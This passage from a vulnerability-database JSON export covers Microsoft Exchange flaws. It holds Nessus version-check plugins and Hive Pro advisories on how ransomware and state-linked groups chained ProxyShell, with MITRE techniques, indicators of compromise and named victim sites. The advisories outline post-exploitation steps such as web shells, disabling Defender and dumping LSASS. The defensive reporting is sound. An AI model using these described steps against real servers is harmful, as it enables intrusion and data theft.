'unsupported_cu': 21,\n 'fixed_version': '15.1.2375.37',\n 'kb': '5019758'\n },\n {\n 'product': '2016',\n 'cu': 23,\n 'unsupported_cu': 21,\n 'fixed_version': '15.1.2507.16',\n 'kb': '5019758'\n },\n {\n 'product' : '2019',\n 'cu': 11,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.986.36',\n 'kb': '5019758'\n },\n {\n 'product' : '2019',\n 'cu': 12,\n 'unsupported_cu': 10,\n 'fixed_version': '15.2.1118.20',\n 'kb': '5019758'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report(\n app_info:app_info,\n bulletin:'MS22-11',\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-11T14:57:41", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482, CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-33766)", "cvss3": {}, "published": "2021-04-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft Exchange Server (April 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483", "CVE-2021-33766", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS21_APR_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/148476", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148476);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-28480\",\n \"CVE-2021-28481\",\n \"CVE-2021-28482\",\n \"CVE-2021-28483\",\n \"CVE-2021-33766\",\n \"CVE-2021-34473\",\n \"CVE-2021-34523\"\n );\n script_xref(name:\"MSKB\", value:\"5001779\");\n script_xref(name:\"MSFT\", value:\"MS21-5001779\");\n script_xref(name:\"IAVA\", value:\"2021-A-0160-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0040\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0022\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0021\");\n\n script_name(english:\"Security Updates for Microsoft Exchange Server (April 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. (CVE-2021-28483, CVE-2021-28482,\n CVE-2021-28481, CVE-2021-28480, CVE-2021-34473)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to\n gain elevated privileges. (CVE-2021-34523)\n\n - An information disclosure vulnerability. An attacker can exploit this to\n disclose potentially sensitive information. (CVE-2021-33766)\");\n # https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-april-13-2021-kb5001779-8e08f3b3-fc7b-466c-bbb7-5d5aa16ef064\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bdeeea7\");\n # https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b66291c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB5001779\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34473\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-34523\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Exchange ProxyShell RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2013',\n 'unsupported_cu' : 22,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.18',\n 'kb': '5001779'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 18,\n 'cu' : 20,\n 'min_version': '15.01.2176.0',\n 'fixed_version': '15.01.2176.14',\n 'kb': '5001779'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 18,\n 'cu' : 20,\n 'min_version': '15.01.2242.0',\n 'fixed_version': '15.01.2242.10',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 8,\n 'min_version': '15.02.792.0',\n 'fixed_version': '15.02.792.15',\n 'kb': '5001779'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 7,\n 'cu' : 9,\n 'min_version': '15.02.858.0',\n 'fixed_version': '15.02.858.12',\n 'kb': '5001779'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS21-05',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 0.0, "vector": "NONE"}}], "akamaiblog": [{"lastseen": "2023-08-11T23:30:47", "description": "Akamai Security Research has released web application firewall protections for Microsoft Exchange CVE-2022-41040 and CVE-2022-41082.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T09:00:00", "type": "akamaiblog", "title": "Akamai?s Response to Zero-Day Vulnerabilities in Microsoft Exchange Server (CVE-2022-41040 and CVE-2022-41082)", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-10-03T09:00:00", "id": "AKAMAIBLOG:0287B84AF09C377FDC8D475774722858", "href": "https://www.akamai.com/blog/security-research/akamais-response-zero-day-vulnerabilities-microsoft-exchange-server", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-10-03T06:08:35", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Microsoft Exchange Server has two unpatched zero-day vulnerabilities. One of them is a Server-Side Request Forgery (SSRF) vulnerability(CVE-2022-41040), while the second is a remote code execution (RCE) vulnerability (CVE-2022-41082)in PowerShell. An authenticated attacker can exploit these vulnerabilities together to gain access to a victim's system by chaining them together.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T10:21:56", "type": "hivepro", "title": "Unpatched zero-day vulnerabilities of Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T10:21:56", "id": "HIVEPRO:B4C85BEFF3E49468BE44E35CEC3A7DE6", "href": "https://www.hivepro.com/unpatched-zero-day-vulnerabilities-of-microsoft-exchange-server/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-18T13:20:19", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/MuddyWater-is-taking-advantage-of-old-vulnerabilities_TA202149.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FA-zero-day-vulnerability-has-been-discovered-in-PANs-GlobalProtect-firewall_TA202148-1.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), and the United Kingdom's National Cyber Security Centre (NCSC) have issued a joint advisory to warn organizations about an APT State sponsored Actor exploiting old Fortinet and proxyshell vulnerabilities. \nSince late March 2021, this APT Iranian State sponsored Actor (MuddyWater) has been breaching vulnerable networks by exploiting Fortinet vulnerabilities. The Hive Pro threat Research team has issued a detailed and in [depth](<https://www.hivepro.com/old-fortinet-vulnerabilities-exploited-by-state-sponsored-actors/>) advisory for the same. \nNow, in October 2021, MuddyWater is getting initial access to the susceptible system by exploiting the well known ProxyShell Vulnerability (CVE 2021 34473). \nIt is recommended that organizations patch these vulnerabilities as soon as available. \nThe Tactics and Techniques used by MuddyWater are: \nTA0042 - Resource Development \nT1588.001 - Obtain Capabilities: Malware \nT1588.002 - Obtain Capabilities: Tool \nTA0001 - Initial Access \nT1190 - Exploit Public Facing Application \nTA0002 - Execution \nT1053.005 - Scheduled Task/Job: Scheduled Task \nTA0003 - Persistence \nT1136.001 - Create Account: Local Account \nT1136.002 - Create Account: Domain Account \nTA0004 - Privilege Escalation \nTA0006 - Credential Access \nTA0009 - Collection \nT1560.001 - Archive Collected Data: Archive via Utility \nTA0010 - Exfiltration \nTA0040 - Impact \nT1486 - Data Encrypted for Impact\n\n#### Actor Details\n\n\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise (IoCs)\n\n\n\n#### Patch Link\n\n<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>\n\n<http://www.securityfocus.com/bid/108693>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-18T11:45:32", "type": "hivepro", "title": "MuddyWater is taking advantage of old vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-11-18T11:45:32", "id": "HIVEPRO:186D6EE394314F861D57F4243E31E975", "href": "https://www.hivepro.com/muddywater-is-taking-advantage-of-old-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-22T15:39:16", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Hive Ransomware has been active since its discovery in June 2021, and it is constantly deploying different backdoors, including the Cobalt Strike beacon, on Microsoft Exchange servers that are vulnerable to ProxyShell (CVE-2021-31207, CVE-2021-34473 and CVE-2021-34523) security flaws. The threat actors then conduct network reconnaissance, obtain admin account credentials, and exfiltrate valuable data before deploying the file-encrypting payload. Hive and their affiliates access their victims' networks by a variety of methods, including phishing emails with malicious attachments, compromised VPN passwords, and exploiting weaknesses on external-facing assets. Furthermore, Hive leaves a plain-text ransom letter threatening to disclose the victim's data on the TOR website 'HiveLeaks' if the victim does not meet the attacker's terms. The Organizations can mitigate the risk by following the recommendations: \u2022Use multi-factor authentication. \u2022Keep all operating systems and software up to date. \u2022Remove unnecessary access to administrative shares. \u2022Maintain offline backups of data and Ensure all backup data is encrypted and immutable. \u2022Enable protected files in the Windows Operating System for critical files. The MITRE ATT&CK TTPs used by Hive Ransomware are: TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and ControlTA0010: Exfiltration TA0040: ImpactT1190: Exploit Public-Facing ApplicationT1566: PhishingT1566.001: Spear-phishing attachmentT1106: Native APIT1204: User ExecutionT1204.002: Malicious FileT1059: Command and Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1047: Windows Management InstrumentT1136: Create AccountT1136.002: Domain AccountT1078: Valid AccountsT1078.002: Domain AccountsT1053: Boot or logon autostart executionT1068: Exploitation for Privilege EscalationT1140: Deobfuscate/Decode Files or InformationT1070: Indicator Removal on Host T1070.001: Clear Windows Event LogsT1562: Impair DefensesT1562.001: Disable or Modify ToolsT1003: OS Credential DumpingT1003.005: Cached Domain Credentials|T1018: Remote System DiscoveryT1021: Remote ServicesT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows admin sharesT1021.006: Windows Remote ManagementT1083: File and directory discoveryT1057: Process discoveryT1063: Security software discoveryT1049: System Network Connections DiscoveryT1135: Network Share DiscoveryT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1570: Lateral tool transfer1486: Data Encrypted for ImpactT1005: Data from local systemT1560: Archive Collected DataT1560.001: Archive via UtilityT1105: Ingress Tool TransferT1567: Exfiltration over web service Actor Details Vulnerability Details Indicators of Compromise (IoCs) Recent Breaches https://millsgrouponline.com/ https://www.fcch.com/ https://www.konradin.de/de/ https://www.pollmann.at/en https://www.emilfrey.ch/de https://rte.com.br/ https://www.friedrich.com/ https://powerhouse1.com/ https://www.hshi.co.kr/eng/ https://www.eurocoininteractive.nl/ https://www.itsinfocom.com/ https://www.pan-energy.com/ https://nsminc.com/ https://www.ucsiuniversity.edu.my/ https://kemlu.go.id/portal/id Patch Links https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523 https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207 References https://www.varonis.com/blog/hive-ransomware-analysis https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-22T14:34:47", "type": "hivepro", "title": "Hive Ransomware targets organizations with ProxyShell exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-22T14:34:47", "id": "HIVEPRO:F2305684A25C735549865536AA4254BF", "href": "https://www.hivepro.com/hive-ransomware-targets-organizations-with-proxyshell-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T05:32:31", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here APT35 aka Magic Hound, an Iranian-backed threat group, has begun using Microsoft Exchange ProxyShell vulnerabilities as an initial attack vector and to execute code through multiple web shells. The group has primarily targeted organizations in the energy, government, and technology sectors based in the United States, the United Kingdom, Saudi Arabia, and the United Arab Emirates, among other countries. The threat actor exploits the Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access to create web shells and disable antivirus services on the victim\u2019s system. To gain persistence in the environment, the threat actor employs both account creation and scheduled tasks. For future re-entry, the account is added to the "remote desktop users" and "local administrator's users" groups. The threat actors use PowerShell to issue multiple commands to disable Windows Defender. Then they create a process memory dump from LSASS.exe that is zipped before exfiltration via web shell. The threat actor uses native Windows programs like "net" and "ipconfig" to enumerate the compromised server. A file masquerading as dllhost.exe is used to access certain domains for command and control. Therefore, data can be exfiltrated by the threat actor which could potentially resulting in information theft and espionage. The Microsoft Exchange ProxyShell vulnerabilities have been fixed in the latest updates from Microsoft. Organizations can patch these vulnerabilities using the patch links given below. The MITRE TTPs commonly used by APT35 are: TA0001: Initial AccessTA0002: ExecutionTA0003: PersistenceTA0004: Privilege EscalationTA0005: Defense EvasionTA0006: Credential AccessTA0007: DiscoveryTA0011: Command and ControlT1190: Exploit Public-Facing ApplicationT1003: OS Credential DumpingT1098: Account ManipulationT1078: Valid AccountsT1105: Ingress Tool TransferT1036: MasqueradingT1036.005: Masquerading: Match Legitimate Name or LocationT1543: Create or Modify System ProcessT1543.003: Create or Modify System Process: Windows ServiceT1505: Server Software ComponentT1505.003: Server Software Component: Web ShellT1082: System Information DiscoveryT1016: System Network Configuration DiscoveryT1033: System Owner/User DiscoveryT1059: Command and Scripting InterpreterT1059.003: Command and Scripting Interpreter: Windows Command Shell Actor Details Vulnerability Details Indicators of Compromise (IoCs) Patches https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523 References https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T04:05:09", "type": "hivepro", "title": "Magic Hound Exploiting Old Microsoft Exchange ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-25T04:05:09", "id": "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "href": "https://www.hivepro.com/magic-hound-exploiting-old-microsoft-exchange-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-07T15:20:43", "description": "#### THREAT LEVEL: Red.\n\n \n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/12/BlackByte-ransomware-exploits-Microsoft-Servers-ProxyShell-vulnerabilities_TA202155.pdf>)\n\nBlackByte ransomware is targeting organizations with unpatched ProxyShell vulnerabilities. Proxy Shell was addressed by hive pro threat researcher in the previous [advisory](<https://www.hivepro.com/proxyshell-and-petitpotam-exploits-weaponized-by-lockfile-ransomware-group/>) released on August 24.\n\nProxyShell is a combination of three flaws in Microsoft Exchange:\n\nCVE-2021-34473 Pre-auth path confusion vulnerability to bypass access control. \nCVE-2021-34523 Privilege escalation vulnerability in the Exchange PowerShell backend. \nCVE-2021-31207 Post-auth remote code execution via arbitrary file write.\n\nThese security flaws are used together by threat actors to perform unauthenticated, remote code execution on vulnerable servers. After exploiting these vulnerabilities, the threat actors then install web shells, coin miners, ransomwares or backdoors on the servers. Attackers then use this web shell to deploy cobalt strike beacon into Windows Update Agent and get the credentials for a service account on compromised servers. The actor then installs Anydesk to gain control of the system and do lateral movement in the organization network. Post exploitation, attackers carry on with using Cobalt Strike to execute the Blackbyte ransomware and encrypt the data.\n\nAffected organizations can decrypt their files using a free decryption tool written by [Trustwave](<https://github.com/SpiderLabs/BlackByteDecryptor>). Users can patch their server for ProxyShell vulnerabilities using the link down below.\n\n**Techniques used by Blackbyte ransomware are :**\n\nT1505.003 Server Software Component: Web Shell \nT1055 Process Injection \nT1059.001 Command and Scripting Interpreter: PowerShell \nT1595.002 Active Scanning: Vulnerability Scanning \nT1027 Obfuscated Files of Information \nT1490 Inhibit System Recovery \nT1112 Modify Registry \nT1562.001 Impair Defenses: Disable or Modify Tools \nT1562.004 Impair Defenses: Disable or Modify System Firewall \nT1018 Remote System Discovery \nT1016 System Network Configuration Discovery \nT1070.004 Indicator Removal on Host: File Deletion \nT1560.001 Archive Collected Data: Archive via Utility\n\n[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n \n\n#### Vulnerability Details\n\n \n\n\n\n \n\n#### Actor Detail\n\n \n\n\n\n \n\n#### Indicators of Compromise(IoCs)\n\n \n\n\n\n \n\n#### Patch Link\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>\n\n \n\n#### References\n\n<https://redcanary.com/blog/blackbyte-ransomware/>\n\n<https://www.techtarget.com/searchsecurity/news/252510334/BlackByte-ransomware-attacks-exploiting-ProxyShell-flaws>\n\n<https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/>\n\n<https://www.stellarinfo.com/blog/blackbyte-ransomware-attacks-exchange-servers-with-proxyshell-flaws/>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-07T13:24:49", "type": "hivepro", "title": "BlackByte ransomware exploits Microsoft Servers ProxyShell Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-12-07T13:24:49", "id": "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "href": "https://www.hivepro.com/blackbyte-ransomware-exploits-microsoft-servers-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-24T12:00:56", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202131.pdf>)[.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202130.pdf>)\n\nLockFile, a new ransomware gang, has been active since last week. LockFile began by using a publicly disclosed PetitPotam exploit (CVE-2021-36942) to compromise Windows Domain Controllers earlier this week. Using ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207), they've now infiltrated many Microsoft Exchange Servers . The origins of this gang are most likely China. This gang used a similar ransomware note as of LokiBot and is been linked to Conti ransomware due to the email id provided (contact@contipauper[.]com). HivePro Threat Research team advises everyone to patch the vulnerabilities to prevent an attack.\n\n#### Vulnerability Details\n\n\n\n#### Actor Details\n\n**Name** | **Target Locations** | **Target Sectors** | \n---|---|---|--- \nLockFile Ransomware | United States of America and Asia | Manufacturing, financial services, engineering, legal, business services, and travel and tourism sectors | \n \n#### Indicators of Compromise (IoCs)\n\n**Type** | **Value** \n---|--- \nIP Address | 209.14.0.234 \nSHA-2 Hash | ed834722111782b2931e36cfa51b38852c813e3d7a4d16717f59c1d037b62291 \ncafe54e85c539671c94abdeb4b8adbef3bde8655006003088760d04a86b5f915 \n36e8bb8719a619b78862907fd49445750371f40945fefd55a9862465dc2930f9 \n5a08ecb2fad5d5c701b4ec42bd0fab7b7b4616673b2d8fbd76557203c5340a0f \n1091643890918175dc751538043ea0743618ec7a5a9801878554970036524b75 \n2a23fac4cfa697cc738d633ec00f3fbe93ba22d2498f14dea08983026fdf128a \n7bcb25854ea2e5f0b8cfca7066a13bc8af8e7bac6693dea1cdad5ef193b052fd \nc020d16902bd5405d57ee4973eb25797087086e4f8079fac0fd8420c716ad153 \na926fe9fc32e645bdde9656470c7cd005b21590cda222f72daf854de9ffc4fe0 \n368756bbcaba9563e1eef2ed2ce59046fb8e69fb305d50a6232b62690d33f690 \nd030d11482380ebf95aea030f308ac0e1cd091c673c7846c61c625bdf11e5c3a \na0066b855dc93cf88f29158c9ffbbdca886a5d6642cbcb9e71e5c759ffe147f8 \n \n#### Patch 